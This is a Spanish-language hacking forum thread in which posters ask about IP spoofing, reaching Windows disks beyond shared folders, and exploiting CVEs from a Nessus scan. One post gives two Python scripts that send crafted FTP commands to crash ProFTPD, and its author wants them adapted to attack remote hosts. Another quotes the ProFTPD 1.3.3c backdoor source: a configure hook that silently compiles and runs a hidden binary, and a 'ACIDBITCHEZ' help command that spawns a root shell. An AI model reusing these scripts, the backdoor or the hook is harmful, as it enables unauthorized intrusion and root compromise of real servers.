Hola gente, tengo una duda. Necesito un ip spoofing para tener una ip publica especifica. Es posible o solo se puede dentro de la LAN? Y si es posible alguien me pasa un tuto o alguna info para echarle un vistazo? Muchas gracias un gran saludo.

Hola, alguien sabe si es posible teniendo acceso a los documentos compartidos de una pc en red local, acceder a todo el disco duro? Hablo de windows y ya estoy harto de ver videos e informacion de ms08_067_netapi ya que esta parcheada en la mayoria de los sistemas :S Existe alguna otra?

Tengo un problema en este código, el puntero es una matriz a la que le doy a cada elemento el valor 'f', el problema esta en cuando lo imprimo al archivo. El total de elementos no se corresponde con el tamaño elegido. Por ejemplo si pongo 100, me imprime 100 'f' mas basura que no se porque sale.¿Alguien sabe porqué?

#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <cstdlib>
#include <iostream>
#include <fstream>
 
using namespace std;
 
int main()
{
 
 
    int nElementos = 0;
    char *PnElementos = NULL;
    int i = 0;
 
 
    printf("Numero de elementos de la matriz: ");
    scanf("%d",&nElementos);
    printf("ELEMENTOS: %d",nElementos);
    Sleep(2000);
    PnElementos = (char*)malloc((nElementos + 1) * sizeof(int));
 
    for(i=0;i<nElementos;i++)
    {
                             PnElementos[i]='f';
                             printf("Valor de elemento(%d) = %c\n",i,PnElementos[i]);
    }
    PnElementos[i]='\0';
    printf("Total elementos matriz = %d",strlen(PnElementos));
    Sleep(5000);
    ofstream fichero;
    fichero.open("archivo.txt");
    fichero << PnElementos;
    free(PnElementos);
    fichero.close();
 
 
}
 

Hola, he encontrado la manera de explotar una vulnerabilidad en ProFTPD < 1.3.3g pero necesito ayuda para modificar los scripts. La vulnerabilidad reside en enviar un comando inexistente mientras se esta descargando un archivo lo que permite ejecutar codigo. Los scripts estan diseñados para hacerlo en una LAN pero quiero modificarlos para que sirva remotamente.

Este es el primer script:

#!/usr/bin/env python
 
# Parameters
ftpClient = "192.168.1.11"
ftpClientPort = "1025"
 
import socket
import time
 
# Open a socket to receive data    
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ftpClient,int(ftpClientPort)))
s.listen(5)        
 
client, address = s.accept()
print client.recv(2)
time.sleep(5)
print client.recv(1024)
client.close()
 

Crea una conexion de datos, lee 2 bytes y espera 5 segundos para que el 2º script envie el comando falso al servidor.

Aqui va el segundo script:

#!/usr/bin/env python
 
# Parameters
ftpServer = "192.168.1.10"
ftpServerPort = 21
ftpUsername = "user"
ftpPassword = "password"
ftpClient = "192.168.1.11"
ftpClientPort = "1025"
 
# Commands to trigger the segmentation fault.
ftpCommands = """USER %s
PASS %s
SYST
TYPE A
PORT %s,%s
RETR nada
WXYZ 0wn3d
QUIT
""" % (ftpUsername, ftpPassword, ftpClient.replace('.',','), "%s,%s"%(("%04x"%int(ftpClientPort))[0:2],("%04x"%int(ftpClientPort))[2:4]))
 
import socket
 
# Open commands socket
sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sc.connect((ftpServer,ftpServerPort))
 
# Will send FTP commands.
for command in ftpCommands.split('\n'):
    print sc.recv(1024),    
    sc.send(command+'\r\n')
    print command

Lo que quisiera modificar es el comando PORT que se envia por un PASV pero en el primer script no puedo poner una ip publica a ftpClient y no recoje los datos del puerto 1025. ¿Alguna manera de hacerlo? Aviso que no se programar en python pero si me dan una idea me pondre a intentarlo. Un saludo y Gracias.

---

Elektro H@cker: Usa el botón "insertar código" o el próximo código será eliminado. Salu2.

Hola a todos, lo primero pedir disculpas por si el post no iva aqui si es asi muevanlo.

Estoy intentando acceder a un host con fines de aprendizaje, tengo permiso para hacerlo. He escaneado los puertos con nmap y he hecho un análisis con nessus integrado en msf, pero a la hora de interpretar los resultados me quedo un poco pillado ya que no entiendo bien como se explotarian esos fallos. Las vulnerabilidades mas graves son estas:


CVE-2006-3918
-------------------------------------------------------------------------------------------------
http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP
 Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header
 from an HTTP request when it is reflected back in an error message, which might allow cross-site
scripting (XSS) style attacks using web client components that can send arbitrary headers in requests,
 as demonstrated using a Flash SWF file.
----------------------------------------------------------------------------------------------------
CVE-2007-1581
----------------------------------------------------------------------------------------------------
The resource system in PHP 5.0.0 through 5.2.1 allows context-dependent attackers to execute arbitrary
code by interrupting the hash_update_file function via a userspace (1) error or (2) stream handler, which
 can then be used to destroy and modify internal resources. NOTE: it was later reported that PHP 5.2 through
5.2.13 and 5.3 through 5.3.2 are also affected.
www.milw0rm.com/exploits/3529
------------------------------------------------------------------------------------------------------
CVE-2008-5814
-----------------------------------------------------------------------------------------------------
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled,
 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the
 lack of details, it is unclear whether this is related to CVE-2006-0208.
-----------------------------------------------------------------------------------------------------
CVE-2008-2371
-----------------------------------------------------------------------------------------------------
Heap-based buffer overflow in pcre_compile.c in the Perl-Compatible Regular Expression (PCRE) library 7.7
allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code
 via a regular expression that begins with an option and contains multiple branches.
------------------------------------------------------------------------------------------------------
CVE-2008-5498
------------------------------------------------------------------------------------------------------
Array index error in the imageRotate function in PHP 5.2.8 and earlier allows context-dependent attackers to
 read the contents of arbitrary memory locations via a crafted value of the third argument
(aka the bgd_color or clrBack argument) for an indexed image.
------------------------------------------------------------------------------------------------------
CVE-2009-3557
------------------------------------------------------------------------------------------------------
The tempnam function in ext/standard/file.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows
context-dependent attackers to bypass safe_mode restrictions, and create files in group-writable
 or world-writable directories, via the dir and prefix arguments.
------------------------------------------------------------------------------------------------------
CVE-2009-3555
------------------------------------------------------------------------------------------------------
The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in
 Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and
 earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4
and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes
 with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions,
 and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request
 that is processed retroactively by a server in a post-renegotiation context, related to a
 "plaintext injection" attack, aka the "Project Mogul" issue.
------------------------------------------------------------------------------------------------------
CVE-2009-3291
------------------------------------------------------------------------------------------------------
The php_openssl_apply_verification_policy function in PHP before 5.2.11 does not properly perform
 certificate validation, which has unknown impact and attack vectors, probably related to an ability
 to spoof certificates.
------------------------------------------------------------------------------------------------------
CVE-2009-2687
-----------------------------------------------------------------------------------------------------
The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a
 denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353.
-----------------------------------------------------------------------------------------------------
CVE-2010-1128
-----------------------------------------------------------------------------------------------------
The Linear Congruential Generator (LCG) in PHP before 5.2.13 does not provide the expected entropy,
 which makes it easier for context-dependent attackers to guess values that were intended to be unpredictable,
 as demonstrated by session cookies generated by using the uniqid function.
-----------------------------------------------------------------------------------------------------
CVE-2010-3436
-----------------------------------------------------------------------------------------------------
fopen_wrappers.c in PHP 5.3.x through 5.3.3 might allow remote attackers to bypass open_basedir restrictions
 via vectors related to the length of a filename.
------------------------------------------------------------------------------------------------------
CVE-2010-4645
------------------------------------------------------------------------------------------------------
strtod.c, as used in the zend_strtod function in PHP 5.2 before 5.2.17 and 5.3 before 5.3.5, and other products,
allows context-dependent attackers to cause a denial of service (infinite loop) via a certain floating-point
 value in scientific notation, which is not properly handled in x87 FPU registers,
 as demonstrated using 2.2250738585072011e-308.
------------------------------------------------------------------------------------------------------
CVE-2011-3389
-----------------------------------------------------------------------------------------------------
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer,
 Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained
initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via
a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with javascript code that
uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API,
aka a "BEAST" attack.
-----------------------------------------------------------------------------------------------------
CVE-2011-0411
-----------------------------------------------------------------------------------------------------
The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9,
and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers
 to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after
 TLS is in place, related to a "plaintext command injection" attack.
------------------------------------------------------------------------------------------------------
CVE-2011-4566
------------------------------------------------------------------------------------------------------
Integer overflow in the exif_process_IFD_TAG function in exif.c in the exif extension in PHP 5.4.0beta2
on 32-bit platforms allows remote attackers to read the contents of arbitrary memory locations or cause
a denial of service via a crafted offset_val value in an EXIF header in a JPEG file, a different
vulnerability than CVE-2011-0708.
------------------------------------------------------------------------------------------------------
CVE-2012-0053
------------------------------------------------------------------------------------------------------
Protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information
 during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain
 the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction
 with crafted web script.



¿Alguien sabe como se usaria alguna de estas vulnerabiliades?

Un saludo y gracias.

Hola a todos, estoy empezando en esto del hacking y tengo unas cuantas dudas sobre como compilar un exploit.

El exploit que quiero compilar es este en concreto: http://www.exploit-db.com/exploits/15662/

Ahora las preguntas:

1.- En el codigo hay cosas como estas que no entiendo que son:

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure   2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@

+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 
 DUALCASE=1; export DUALCASE
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
 
 
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c  2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@

2.- En esta parte de código pone #include "conf.h", tengo entendio que en c poner entre comillas un archivo significa que no es una libreria del sistema y que es un archivo creado por el usuario, ¿Como compilo ese exploit si no tengo ese archivo?

 #include "conf.h"
#include <stdlib.h>
#include <string.h>
  
 struct help_rec {
   const char *cmd;

         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
  
     } else {

      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++)

3.- Gracias por contestar y un saludo!